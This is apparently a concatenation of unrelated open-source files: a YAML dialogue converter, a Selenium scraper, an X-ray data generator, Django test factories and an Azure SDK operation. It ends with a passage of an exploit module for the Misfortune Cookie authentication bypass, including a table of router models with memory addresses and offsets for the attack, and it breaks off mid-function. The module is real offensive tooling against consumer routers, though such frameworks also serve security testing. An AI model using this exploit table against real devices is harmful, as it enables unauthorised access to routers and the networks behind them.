args.kapsel_port] QuoteApplication(port=args.kapsel_port, prefix=args.kapsel_url_prefix, hosts=args.kapsel_host).run()
bsd-3-clause
-1,188,982,769,034,152,700
41.757009
120
0.65071
false
parpg/parpg
tools/utilities/convert_dialogue.py
1
3506
#!/usr/bin/env python """Convert YAML dialogue files from the Techdemo1 format to the new Techdemo2 format. @author: M. George Hansen <technopolitica@gmail.com> """ import os.path import sys sys.path.insert(0, os.path.realpath(os.path.join(os.path.dirname(__file__), os.path.pardir))) import shutil import logging from optparse import OptionParser from parpg.dialogueparsers import (OldYamlDialogueParser, YamlDialogueParser, DialogueFormatError) def backup_file(filepath): dirpath = os.path.dirname(filepath) filename = os.path.basename(filepath) shutil.copy2(filepath, os.path.join(dirpath, '.'.join([filename, 'backup']))) def convert_dialogue_file(filepath, backup): logging.info('processing {0}...'.format(filepath)) dummy, extension = os.path.splitext(filepath) if (not extension == '.yaml'): logging.info(' skipping {0}: not a yaml file'.format(filepath)) return 1 with file(filepath, 'r') as dialogue_file: old_parser = OldYamlDialogueParser() new_parser = YamlDialogueParser() try: dialogue = old_parser.load(dialogue_file) except DialogueFormatError as error: logging.info( ' unable to convert {0}: unrecognized dialogue format' .format(filepath) ) return 1 if (backup): backup_file(filepath) logging.info(' backed up {0} as {0}.backup'.format(filepath)) with file(filepath, 'w') as dialogue_file: new_parser.dump(dialogue, dialogue_file) logging.info(' successfully converted {0}!'.format(filepath)) usage_message = '''\ usage: convert_dialogue.py [-h] [-n] [-v] [-q] file_or_dir Convert YAML dialogue files written in Techdemo1 syntax to the new Techdemo2 syntax. If the file_or_dir argument is a directory, then this script will attempt to convert all .yaml files in the directory that contain valid dialogues. By default all processed files are first backed up by adding a ".backup" suffix to the filename + extension. Backups can be disabled by passing the -n option to the script. ''' def main(argv=sys.argv): # Options. backup = True logging_level = logging.WARNING parser = OptionParser(usage=usage_message, description="Convert YAML dialogue files written " "in Techdemo1 syntax to the new " "Techdemo2 syntax.") parser.add_option('-n', '--no-backup', default=True) parser.add_option('-v', '--verbose', action='count', default=0) parser.add_option('-q', '--quiet', action='count', default=0) opts, args = parser.parse_args() verbosity = opts.verbose * 10 quietness = - (opts.quiet * 10) logging_level += (verbosity + quietness) logging.basicConfig(format='%(message)s', level=logging_level) try: path = args[0] except IndexError: parser.print_help() sys.exit(1) if (os.path.isdir(path)): for filepath in os.listdir(path): qualified_filepath = os.path.join(path, filepath) if (not os.path.isfile(qualified_filepath)): continue convert_dialogue_file(qualified_filepath, backup=backup) else: convert_dialogue_file(path, backup=backup) if __name__ == '__main__': main()
gpl-3.0
1,915,518,116,129,695,200
34.77551
79
0.617513
false
hoaibang07/Webscrap
transcripture/sources/crawler_chuongthieu.py
1
7017
# -*- encoding: utf-8 -*- import io from bs4 import BeautifulSoup from bs4 import SoupStrainer import urllib2 import urlparse from selenium import webdriver from selenium.webdriver.common.keys import Keys import time from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from selenium.common.exceptions import TimeoutException import os.path zenmatePath = "/home/hbc/.mozilla/firefox/yeyuaq0s.default/extensions/firefox@zenmate.com.xpi" ffprofile = webdriver.FirefoxProfile() # ffprofile.set_preference("javascript.enabled", False) # ffprofile.set_preference('permissions.default.image', 2) # ffprofile.set_preference('permissions.default.stylesheet', 2) # ffprofile.set_preference('dom.ipc.plugins.enabled.libflashplayer.so', 'false') ffprofile.add_extension(zenmatePath) ffprofile.add_extension('/home/hbc/Downloads/quickjava-2.0.6-fx.xpi') ffprofile.set_preference("thatoneguydotnet.QuickJava.curVersion", "2.0.6.1") ## Prevents loading the 'thank you for installing screen' ffprofile.set_preference("thatoneguydotnet.QuickJava.startupStatus.Images", 2) ## Turns images off ffprofile.set_preference("thatoneguydotnet.QuickJava.startupStatus.AnimatedImage", 2) ## Turns animated images off ffprofile.set_preference("thatoneguydotnet.QuickJava.startupStatus.CSS", 2) ## CSS # ffprofile.set_preference("thatoneguydotnet.QuickJava.startupStatus.Cookies", 2) ## Cookies ffprofile.set_preference("thatoneguydotnet.QuickJava.startupStatus.Flash", 2) ## Flash ffprofile.set_preference("thatoneguydotnet.QuickJava.startupStatus.Java", 2) ## Java # ffprofile.set_preference("thatoneguydotnet.QuickJava.startupStatus.JavaScript", 2) ## JavaScript ffprofile.set_preference("thatoneguydotnet.QuickJava.startupStatus.Silverlight", 2) ## Silverlight driver = webdriver.Firefox(ffprofile) def _remove_div_vdx(soup): for div in soup.find_all('div', class_='vidx'): div.extract() return soup def get_data(urlchuong_list, i): filename = 'urlsach/data/bosung/sach' + str(i) + '.txt' ftmp = io.open(filename, 'w', encoding='utf-8') try: # hdrs = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', # 'Connection': 'keep-alive', # 'Cookie': 'ipq_lip=20376774; ipq_set=1453874029; __atuvc=2%7C4; __utma=126044488.676620502.1453787537.1453787537.1453787537.1; __utmz=126044488.1453787537.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=ed3f4874b92a29b6ed036adfa5ad6fb3; ipcountry=us', # 'Host': 'www.transcripture.com', # 'Referer': 'http://www.transcripture.com/vietnamese-spanish-genesis-1.html', # 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0' # } count = 1 for urlchuong in urlchuong_list: print('Dang get chuong %d, sach %d'%(count,i)) # urlchuong = 'http://www.transcripture.com/vietnamese-chinese-revelation-3.html' # print urlchuong # # create request # req = urllib2.Request(urlchuong, headers=hdrs) # # get response # response = urllib2.urlopen(req) # soup = BeautifulSoup(response.read()) # Load a page driver.get(urlchuong) # delay = 40 # seconds # try: # wait = WebDriverWait(driver, delay) # path = '/html/body/center/div[1]/div[2]/div[4]/table/tbody/tr[2]/td[1]/div/div[1]/form[1]/select/option[66]' # elem = driver.find_element_by_xpath(path) # wait.until(EC.visibility_of(elem)) # print "Page is ready!" # except TimeoutException: # print "Loading took too much time!" # #reload page # body = driver.find_element_by_tag_name("body") # body.send_keys(Keys.ESCAPE) # body.send_keys(Keys.F5) content = driver.page_source soup = BeautifulSoup(content) soup = _remove_div_vdx(soup) # print soup table_tag = soup.find_all('table', attrs={'width':'100%', 'cellspacing':'0'})[0] tr_tags = table_tag.find_all('tr') _len = len(tr_tags) # in first tr tag: h2_class = tr_tags[0].find_all('h2', class_='cphd') ftmp.write(u'' + h2_class[0].get_text() + '|') ftmp.write(u'' + h2_class[1].get_text() + '\n') # print table_tag for x in xrange(1,_len): data = tr_tags[x].get_text('|') # print data # url_ec = url.encode('unicode','utf-8') ftmp.write(u'' + data + '\n') count = count + 1 # close file ftmp.close() except Exception, e: print e # close file ftmp.close() def check_numline(filename): urlsach_list = [] urlsach_file = open(filename, 'r') for line in urlsach_file: urlsach_list.append(line.strip()) _len = len(urlsach_list) return _len def getsttchuongthieu(sachi): list_stt = [] urlsach = 'urlsach/sach' + str(sachi) + '.txt' #kiem tra so dong cua url sach, tuong ung voi so chuong numline = check_numline(urlsach) fname = 'urlsach/data/partcomplete/sach' + str(sachi) + '.txt' #doc data tu file sach data data = open(fname).read() #kiem tra xem moi dong trong file sach data da co chuong cac so nay chua for i in xrange(1,numline + 1): key = str(i) # print ('da chay den day') if key not in data: list_stt.append(i) return list_stt def getlisturlchuongthieu(sachi): list_chuongthieu = [] list_stt = getsttchuongthieu(sachi) fname = 'urlsach/sach' + str(sachi) + '.txt' fp = open(fname) lines=fp.readlines() for stt in list_stt: list_chuongthieu.append(lines[stt-1]) return list_chuongthieu def main(): for x in xrange(1,67): #kiem tra xem duong dan co trong thu muc partcomplete hay khong f2name = 'urlsach/data/partcomplete/sach' + str(x) + '.txt' if os.path.isfile(f2name): list_urlchuongthieu = getlisturlchuongthieu(x) get_data(list_urlchuongthieu, x) if __name__ == '__main__': # driver = webdriver.Firefox() driver.get("about:blank") # open new tab # body = driver.find_element_by_tag_name("body") # body.send_keys(Keys.CONTROL + 't') # time.sleep(15) print('Nhap vao mot ky tu bat ky de tiep tuc chuong trinh') key = raw_input() main() # close the tab driver.find_element_by_tag_name('body').send_keys(Keys.COMMAND + 'w') driver.close() # urlchuong_list = ['http://www.transcripture.com/vietnamese-chinese-exodus-1.html'] # get_data(urlchuong_list, 2)
gpl-2.0
-8,064,880,054,819,888,000
35.936842
282
0.619353
false
tonnrueter/pymca_devel
PyMca/EPDL97/GenerateEADLShellNonradiativeRates.py
1
6235
__doc__= "Generate specfiles with EADL97 shell transition probabilities" import os import sys import EADLParser Elements = ['H', 'He', 'Li', 'Be', 'B', 'C', 'N', 'O', 'F', 'Ne', 'Na', 'Mg', 'Al', 'Si', 'P', 'S', 'Cl', 'Ar', 'K', 'Ca', 'Sc', 'Ti', 'V', 'Cr', 'Mn', 'Fe', 'Co', 'Ni', 'Cu', 'Zn', 'Ga', 'Ge', 'As', 'Se', 'Br', 'Kr', 'Rb', 'Sr', 'Y', 'Zr', 'Nb', 'Mo', 'Tc', 'Ru', 'Rh', 'Pd', 'Ag', 'Cd', 'In', 'Sn', 'Sb', 'Te', 'I', 'Xe', 'Cs', 'Ba', 'La', 'Ce', 'Pr', 'Nd', 'Pm', 'Sm', 'Eu', 'Gd', 'Tb', 'Dy', 'Ho', 'Er', 'Tm', 'Yb', 'Lu', 'Hf', 'Ta', 'W', 'Re', 'Os', 'Ir', 'Pt', 'Au', 'Hg', 'Tl', 'Pb', 'Bi', 'Po', 'At', 'Rn', 'Fr', 'Ra', 'Ac', 'Th', 'Pa', 'U', 'Np', 'Pu', 'Am', 'Cm', 'Bk', 'Cf', 'Es', 'Fm', 'Md', 'No', 'Lr', 'Rf', 'Db', 'Sg', 'Bh', 'Hs', 'Mt'] def getHeader(filename): text = '#F %s\n' % filename text += '#U00 This file is a conversion to specfile format of \n' text += '#U01 directly extracted EADL97 nonradiative transition probabilities.\n' text += '#U02 EADL itself can be found at:\n' text += '#U03 http://www-nds.iaea.org/epdl97/libsall.htm\n' text += '#U04 The code used to generate this file has been:\n' text += '#U05 %s\n' % os.path.basename(__file__) text += '#U06\n' text += '\n' return text shellList = EADLParser.getBaseShellList() workingShells = ['K', 'L1', 'L2', 'L3', 'M1', 'M2', 'M3', 'M4', 'M5'] for shell in workingShells: fname = "EADL97_%sShellNonradiativeRates.dat" % shell[0] print("fname = %s" % fname) if shell in ['K', 'L1', 'M1']: if os.path.exists(fname): os.remove(fname) nscan = 0 outfile = open(fname, 'wb') tmpText = getHeader(fname) if sys.version < '3.0': outfile.write(tmpText) else: outfile.write(tmpText.encode('UTF-8')) nscan += 1 for i in range(1,101): print("Z = %d, Element = %s" % (i, Elements[i-1])) element = Elements[i-1] ddict = {} for key0 in shellList: tmpKey = key0.split()[0] if tmpKey in workingShells: if workingShells.index(tmpKey) <= workingShells.index(shell): continue for key1 in shellList: tmpKey = key1.split()[0] if tmpKey in workingShells: if workingShells.index(tmpKey) <= workingShells.index(shell): continue key = "%s-%s%s" % (shell, key0.split()[0], key1.split()[0]) if shell in [key0.split()[0], key1.split()[0]]: continue ddict[key] = [0.0, 0.0] try: ddict = EADLParser.getNonradiativeTransitionProbabilities(\ Elements.index(element)+1, shell=shell) print("%s Shell nonradiative emission probabilities " % shell) except IOError: #This happens when reading elements not presenting the transitions pass #continue if i == 1: #generate the labels nTransitions = 0 tmpText = '#L Z TOTAL' for key0 in workingShells: tmpKey = key0.split()[0] if tmpKey in workingShells: if workingShells.index(tmpKey) <= workingShells.index(shell): continue for key1 in shellList: tmpKey = key1.split()[0] if tmpKey in workingShells: if workingShells.index(tmpKey) <= workingShells.index(shell): continue key = "%s-%s%s" % (shell, key0.split()[0], key1.split()[0]) tmpText += ' %s' % (key) nTransitions += 1 text = '#S %d %s-Shell nonradiative rates\n' % (nscan, shell) text += '#N %d\n' % (2 + nTransitions) text += tmpText + '\n' else: text = '' # this loop calculates the totals, because it cannot be deduced from the subset # transitions written in the file total = 0.0 for key0 in shellList: tmpKey = key0.split()[0] if tmpKey in workingShells: if workingShells.index(tmpKey) <= workingShells.index(shell): continue for key1 in shellList: tmpKey = key1.split()[0] if tmpKey in workingShells: if workingShells.index(tmpKey) <= workingShells.index(shell): continue key = "%s-%s%s" % (shell, key0.split()[0], key1.split()[0]) total += ddict.get(key, [0.0, 0.0])[0] text += '%d %.7E' % (i, total) for key0 in workingShells: tmpKey = key0.split()[0] if tmpKey in workingShells: if workingShells.index(tmpKey) <= workingShells.index(shell): continue for key1 in shellList: tmpKey = key1.split()[0] if tmpKey in workingShells: if workingShells.index(tmpKey) <= workingShells.index(shell): continue key = "%s-%s%s" % (shell, key0.split()[0], key1.split()[0]) valueToWrite = ddict.get(key, [0.0, 0.0])[0] if valueToWrite == 0.0: text += ' 0.0' else: text += ' %.7E' % valueToWrite text += '\n' if sys.version < '3.0': outfile.write(text) else: outfile.write(text.encode('UTF-8')) if sys.version < '3.0': outfile.write('\n') else: outfile.write('\n'.encode('UTF-8')) if sys.version < '3.0': outfile.write('\n') else: outfile.write('\n'.encode('UTF-8')) outfile.close()
gpl-2.0
4,806,273,130,956,564,000
42.601399
87
0.455654
false
mangaki/mangaki
mangaki/mangaki/factories.py
1
1591
import factory from factory.django import DjangoModelFactory, mute_signals from .models import Profile, Work, Category from django.contrib.auth.models import User from django.db.models.signals import post_save class ProfileFactory(DjangoModelFactory): class Meta: model = Profile user = factory.SubFactory('mangaki.factories.UserFactory', profile=None) mal_username = factory.Faker('user_name') is_shared = factory.Faker('boolean') nsfw_ok = factory.Faker('boolean') newsletter_ok = factory.Faker('boolean') avatar_url = factory.LazyAttribute(lambda o: '{}{}.png'.format(factory.Faker('url').generate({}), o.mal_username)) @mute_signals(post_save) class UserFactory(DjangoModelFactory): class Meta: model = User username = factory.Faker('user_name') email = factory.LazyAttribute(lambda o: '{}@mangaki.fr'.format(o.username)) profile = factory.RelatedFactory(ProfileFactory, 'user') class WorkFactory(DjangoModelFactory): class Meta: model = Work category = factory.Iterator(Category.objects.all()) @factory.iterator def title(): qs = Work.objects.values_list('title', flat=True).all()[:20] for title in qs: yield title nsfw = factory.Faker('boolean') synopsis = factory.Faker('text') def create_user(**kwargs): return UserFactory.create(**kwargs) def create_user_with_profile(**kwargs): profile = kwargs.pop('profile') user = create_user(**kwargs) for key, value in profile.items(): setattr(user.profile, key, value) return user
agpl-3.0
-2,614,688,259,151,753,700
29.018868
118
0.688875
false
Azure/azure-sdk-for-python
sdk/databoxedge/azure-mgmt-databoxedge/azure/mgmt/databoxedge/v2019_08_01/operations/_jobs_operations.py
1
4882
# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is regenerated. # -------------------------------------------------------------------------- from typing import TYPE_CHECKING import warnings from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error from azure.core.pipeline import PipelineResponse from azure.core.pipeline.transport import HttpRequest, HttpResponse from azure.mgmt.core.exceptions import ARMErrorFormat from .. import models as _models if TYPE_CHECKING: # pylint: disable=unused-import,ungrouped-imports from typing import Any, Callable, Dict, Generic, Optional, TypeVar T = TypeVar('T') ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]] class JobsOperations(object): """JobsOperations operations. You should not instantiate this class directly. Instead, you should create a Client instance that instantiates it for you and attaches it as an attribute. :ivar models: Alias to model classes used in this operation group. :type models: ~azure.mgmt.databoxedge.v2019_08_01.models :param client: Client for service requests. :param config: Configuration of service client. :param serializer: An object model serializer. :param deserializer: An object model deserializer. """ models = _models def __init__(self, client, config, serializer, deserializer): self._client = client self._serialize = serializer self._deserialize = deserializer self._config = config def get( self, device_name, # type: str name, # type: str resource_group_name, # type: str **kwargs # type: Any ): # type: (...) -> "_models.Job" """Gets the details of a specified job on a Data Box Edge/Data Box Gateway device. Gets the details of a specified job on a Data Box Edge/Data Box Gateway device. :param device_name: The device name. :type device_name: str :param name: The job name. :type name: str :param resource_group_name: The resource group name. :type resource_group_name: str :keyword callable cls: A custom type or function that will be passed the direct response :return: Job, or the result of cls(response) :rtype: ~azure.mgmt.databoxedge.v2019_08_01.models.Job :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType["_models.Job"] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError } error_map.update(kwargs.pop('error_map', {})) api_version = "2019-08-01" accept = "application/json" # Construct URL url = self.get.metadata['url'] # type: ignore path_format_arguments = { 'deviceName': self._serialize.url("device_name", device_name, 'str'), 'name': self._serialize.url("name", name, 'str'), 'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'), 'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str') # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') request = self._client.get(url, query_parameters, header_parameters) pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response, error_format=ARMErrorFormat) deserialized = self._deserialize('Job', pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataBoxEdge/dataBoxEdgeDevices/{deviceName}/jobs/{name}'} # type: ignore
mit
-2,191,556,967,445,919,200
43.381818
188
0.65383
false
j91321/rext
modules/exploits/allegrosoft/misfortune_auth_bypass.py
1
22767
# Name:Misfortune Cookie vulnerability authentication bypass # File:misfortune_auth_bypass.py # Author:Ján Trenčanský # License: GNU GPL v3 # Created: 22.9.2016 # Description: PoC based on 31C3 presentation, # exploit based on Marcin Bury and Milad Doorbash routersploit module. import core.Exploit import interface.utils from core.io import query_yes_no from interface.messages import print_failed, print_success, print_warning, print_error, print_info, print_help import requests import requests.exceptions import re class Exploit(core.Exploit.RextExploit): """ Name:Misfortune Cookie vulnerability authentication bypass File:misfortune_auth_bypass.py Author:Ján Trenčanský License: GNU GPL v3 Created: 4.2.2014 Description: PoC based on 31C3 presentation, exploit based on Marcin Bury and Milad Doorbash routersploit module. Options: Name Description host Target host address port Target port model Target model """ devices = None number = None offset = None def __init__(self): # This part is directly taken from routersploit module self.devices = [ # brand # model # firmware {'name': "Azmoon AZ-D140W 2.11.89.0(RE2.C29)3.11.11.52_PMOFF.1", 'number': 107367693, 'offset': 13}, # 0x803D5A79 # tested {'name': "Billion BiPAC 5102S Av2.7.0.23 (UE0.B1C)", 'number': 107369694, 'offset': 13}, # 0x8032204d # ---------- {'name': "Billion BiPAC 5102S Bv2.7.0.23 (UE0.B1C)", 'number': 107369694, 'offset': 13}, # 0x8032204d # ---------- {'name': "Billion BiPAC 5200 2.11.84.0(UE2.C2)3.11.11.6", 'number': 107369545, 'offset': 9}, # 0x803ec2ad # ---------- {'name': "Billion BiPAC 5200 2_11_62_2_ UE0.C2D_3_10_16_0", 'number': 107371218, 'offset': 21}, # 0x803c53e5 # ---------- {'name': "Billion BiPAC 5200A 2_10_5 _0(RE0.C2)3_6_0_0", 'number': 107366366, 'offset': 25}, # 0x8038a6e1 # ---------- {'name': "Billion BiPAC 5200A 2_11_38_0 (RE0.C29)3_10_5_0", 'number': 107371453, 'offset': 9}, # 0x803b3a51 # ---------- {'name': "Billion BiPAC 5200GR4 2.11.91.0(RE2.C29)3.11.11.52", 'number': 107367690, 'offset': 21}, # 0x803D8A51 # tested {'name': "Billion BiPAC 5200SRD 2.10.5.0 (UE0.C2C) 3.6.0.0", 'number': 107368270, 'offset': 1}, # 0x8034b109 # ---------- {'name': "Billion BiPAC 5200SRD 2.12.17.0_UE2.C3_3.12.17.0", 'number': 107371378, 'offset': 37}, # 0x8040587d # ---------- {'name': "Billion BiPAC 5200SRD 2_11_62_2(UE0.C3D)3_11_11_22", 'number': 107371218, 'offset': 13}, # 0x803c49d5 # ---------- {'name': "D-Link DSL-2520U Z1 1.08 DSL-2520U_RT63261_Middle_East_ADSL", 'number': 107368902, 'offset': 25}, # 0x803fea01 # tested {'name': "D-Link DSL-2600U Z1_DSL-2600U", 'number': 107366496, 'offset': 13}, # 0x8040637d # ---------- {'name': "D-Link DSL-2600U Z2_V1.08_ras", 'number': 107360133, 'offset': 20}, # 0x803389B0 # ---------- {'name': "TP-Link TD-8616 V2_080513", 'number': 107371483, 'offset': 21}, # 0x80397055 # ---------- {'name': "TP-Link TD-8816 V4_100528_Russia", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # ---------- {'name': "TP-Link TD-8816 V4_100524", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # ---------- {'name': "TP-Link TD-8816 V5_100528_Russia", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # ---------- {'name': "TP-Link TD-8816 V5_100524", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # tested {'name': "TP-Link TD-8816 V5_100903", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # ---------- {'name': "TP-Link TD-8816 V6_100907", 'number': 107371426, 'offset': 17}, # 0x803c6e09 # ---------- {'name': "TP-Link TD-8816 V7_111103", 'number': 107371161, 'offset': 1}, # 0x803e1bd5 # ---------- {'name': "TP-Link TD-8816 V7_130204", 'number': 107370211, 'offset': 5}, # 0x80400c85 # ---------- {'name': "TP-Link TD-8817 V5_100524", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # ---------- {'name': "TP-Link TD-8817 V5_100702_TR", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # ---------- {'name': "TP-Link TD-8817 V5_100903", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # ---------- {'name': "TP-Link TD-8817 V6_100907", 'number': 107369788, 'offset': 1}, # 0x803b6e09 # ---------- {'name': "TP-Link TD-8817 V6_101221", 'number': 107369788, 'offset': 1}, # 0x803b6e09 # ---------- {'name': "TP-Link TD-8817 V7_110826", 'number': 107369522, 'offset': 25}, # 0x803d1bd5 # ---------- {'name': "TP-Link TD-8817 V7_130217", 'number': 107369316, 'offset': 21}, # 0x80407625 # ---------- {'name': "TP-Link TD-8817 V7_120509", 'number': 107369321, 'offset': 9}, # 0x803fbcc5 # tested {'name': "TP-Link TD-8817 V8_140311", 'number': 107351277, 'offset': 20}, # 0x8024E148 # tested {'name': "TP-Link TD-8820 V3_091223", 'number': 107369768, 'offset': 17}, # 0x80397E69 # tested {'name': "TP-Link TD-8840T V1_080520", 'number': 107369845, 'offset': 5}, # 0x80387055 # ---------- {'name': "TP-Link TD-8840T V2_100525", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # tested {'name': "TP-Link TD-8840T V2_100702_TR", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # ---------- {'name': "TP-Link TD-8840T V2_090609", 'number': 107369570, 'offset': 1}, # 0x803c65d5 # ---------- {'name': "TP-Link TD-8840T V3_101208", 'number': 107369766, 'offset': 17}, # 0x803c3e89 # tested {'name': "TP-Link TD-8840T V3_110221", 'number': 107369764, 'offset': 5}, # 0x803d1a09 # ---------- {'name': "TP-Link TD-8840T V3_120531", 'number': 107369688, 'offset': 17}, # 0x803fed35 # ---------- {'name': "TP-Link TD-W8101G V1_090107", 'number': 107367772, 'offset': 37}, # 0x803bf701 # ---------- {'name': "TP-Link TD-W8101G V1_090107", 'number': 107367808, 'offset': 21}, # 0x803e5b6d # ---------- {'name': "TP-Link TD-W8101G V2_100819", 'number': 107367751, 'offset': 21}, # 0x803dc701 # ---------- {'name': "TP-Link TD-W8101G V2_101015_TR", 'number': 107367749, 'offset': 13}, # 0x803e1829 # ---------- {'name': "TP-Link TD-W8101G V2_101101", 'number': 107367749, 'offset': 13}, # 0x803e1829 # ---------- {'name': "TP-Link TD-W8101G V3_110119", 'number': 107367765, 'offset': 25}, # 0x804bb941 # ---------- {'name': "TP-Link TD-W8101G V3_120213", 'number': 107367052, 'offset': 25}, # 0x804e1ff9 # ---------- {'name': "TP-Link TD-W8101G V3_120604", 'number': 107365835, 'offset': 1}, # 0x804f16a9 # ---------- {'name': "TP-Link TD-W8151N V3_120530", 'number': 107353867, 'offset': 24}, # 0x8034F3A4 # tested {'name': "TP-Link TD-W8901G V1_080522", 'number': 107367787, 'offset': 21}, # 0x803AB30D # tested {'name': "TP-Link TD-W8901G V1,2_080522", 'number': 107368013, 'offset': 5}, # 0x803AB30D # ---------- {'name': "TP-Link TD-W8901G V2_090113_Turkish", 'number': 107368013, 'offset': 5}, # 0x803AB30D # ---------- {'name': "TP-Link TD-W8901G V3_140512", 'number': 107367854, 'offset': 9}, # 0x803cf335 # tested {'name': "TP-Link TD-W8901G V3_100603", 'number': 107367751, 'offset': 21}, # 0x803DC701 # tested {'name': "TP-Link TD-W8901G V3_100702_TR", 'number': 107367751, 'offset': 21}, # 0x803DC701 # tested {'name': "TP-Link TD-W8901G V3_100901", 'number': 107367749, 'offset': 13}, # 0x803E1829 # tested {'name': "TP-Link TD-W8901G V6_110119", 'number': 107367765, 'offset': 25}, # 0x804BB941 # tested {'name': "TP-Link TD-W8901G V6_110915", 'number': 107367682, 'offset': 21}, # 0x804D7CB9 # tested {'name': "TP-Link TD-W8901G V6_120418", 'number': 107365835, 'offset': 1}, # 0x804F16A9 # ---------- {'name': "TP-Link TD-W8901G V6_120213", 'number': 107367052, 'offset': 25}, # 0x804E1FF9 # ---------- {'name': "TP-Link TD-W8901GB V3_100727", 'number': 107367756, 'offset': 13}, # 0x803dfbe9 # ---------- {'name': "TP-Link TD-W8901GB V3_100820", 'number': 107369393, 'offset': 21}, # 0x803f1719 # ---------- {'name': "TP-Link TD-W8901N V1_111211", 'number': 107353880, 'offset': 0}, # 0x8034FF94 # tested {'name': "TP-Link TD-W8951ND V1_101124,100723,100728", 'number': 107369839, 'offset': 25}, # 0x803d2d61 # tested {'name': "TP-Link TD-W8951ND V1_110907", 'number': 107369876, 'offset': 13}, # 0x803d6ef9 # ---------- {'name': "TP-Link TD-W8951ND V1_111125", 'number': 107369876, 'offset': 13}, # 0x803d6ef9 # ---------- {'name': "TP-Link TD-W8951ND V3.0_110729_FI", 'number': 107366743, 'offset': 21}, # 0x804ef189 # ---------- {'name': "TP-Link TD-W8951ND V3_110721", 'number': 107366743, 'offset': 21}, # 0x804ee049 # ---------- {'name': "TP-Link TD-W8951ND V3_20110729_FI", 'number': 107366743, 'offset': 21}, # 0x804ef189 # ---------- {'name': "TP-Link TD-W8951ND V4_120511", 'number': 107364759, 'offset': 25}, # 0x80523979 # tested {'name': "TP-Link TD-W8951ND V4_120607", 'number': 107364759, 'offset': 13}, # 0x80524A91 # tested {'name': "TP-Link TD-W8951ND V4_120912_FL", 'number': 107364760, 'offset': 21}, # 0x80523859 # tested {'name': "TP-Link TD-W8961NB V1_110107", 'number': 107369844, 'offset': 17}, # 0x803de3f1 # tested {'name': "TP-Link TD-W8961NB V1_110519", 'number': 107369844, 'offset': 17}, # 0x803de3f1 # ---------- {'name': "TP-Link TD-W8961NB V2_120319", 'number': 107367629, 'offset': 21}, # 0x80531859 # ---------- {'name': "TP-Link TD-W8961NB V2_120823", 'number': 107366421, 'offset': 13}, # 0x80542e59 # ---------- {'name': "TP-Link TD-W8961ND V1_100722,101122", 'number': 107369839, 'offset': 25}, # 0x803D2D61 # tested {'name': "TP-Link TD-W8961ND V1_101022_TR", 'number': 107369839, 'offset': 25}, # 0x803D2D61 # ---------- {'name': "TP-Link TD-W8961ND V1_111125", 'number': 107369876, 'offset': 13}, # 0x803D6EF9 # ---------- {'name': "TP-Link TD-W8961ND V2_120427", 'number': 107364732, 'offset': 25}, # 0x8052e0e9 # ---------- {'name': "TP-Link TD-W8961ND V2_120710_UK", 'number': 107364771, 'offset': 37}, # 0x80523AA9 # ---------- {'name': "TP-Link TD-W8961ND V2_120723_FI", 'number': 107364762, 'offset': 29}, # 0x8052B6B1 # ---------- {'name': "TP-Link TD-W8961ND V3_120524,120808", 'number': 107353880, 'offset': 0}, # 0x803605B4 # ---------- {'name': "TP-Link TD-W8961ND V3_120830", 'number': 107353414, 'offset': 36}, # 0x803605B4 # ---------- {'name': "ZyXEL P-660R-T3 3.40(BOQ.0)C0", 'number': 107369567, 'offset': 21}, # 0x803db071 # tested {'name': "ZyXEL P-660RU-T3 3.40(BJR.0)C0", 'number': 107369567, 'offset': 21}, # 0x803db071 ] core.Exploit.RextExploit.__init__(self) def do_list(self, e): counter = 0 print_info("ID\tManufacturer\tModel\tFirmware") for device in self.devices: print_info("%d %s" % (counter, self.devices[counter]['name'])) counter += 1 def do_set(self, e): args = e.split(' ') try: if args[0] == "host": if interface.utils.validate_ipv4(args[1]): self.host = args[1] else: print_error("Please provide valid IPv4 address") elif args[0] == "port": if str.isdigit(args[1]): self.port = args[1] else: print_error("Port value must be integer") elif args[0] == 'device': if not str.isdigit(args[1]): print_error("Invalid device ID") elif int(args[1]) < 0 or int(args[1]) > len(self.devices): print_error("Invalid device ID") else: index = int(args[1]) print_info("Device: %s" % self.devices[index]['name']) self.number = self.devices[index]['number'] print_info("Setting address to: %d" % self.number) self.offset = self.devices[index]['offset'] print_info("Setting offset: %d" % self.offset) except IndexError: print_error("please specify value for variable") def check(self): user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)' headers = {'User-Agent': user_agent, 'Accept': 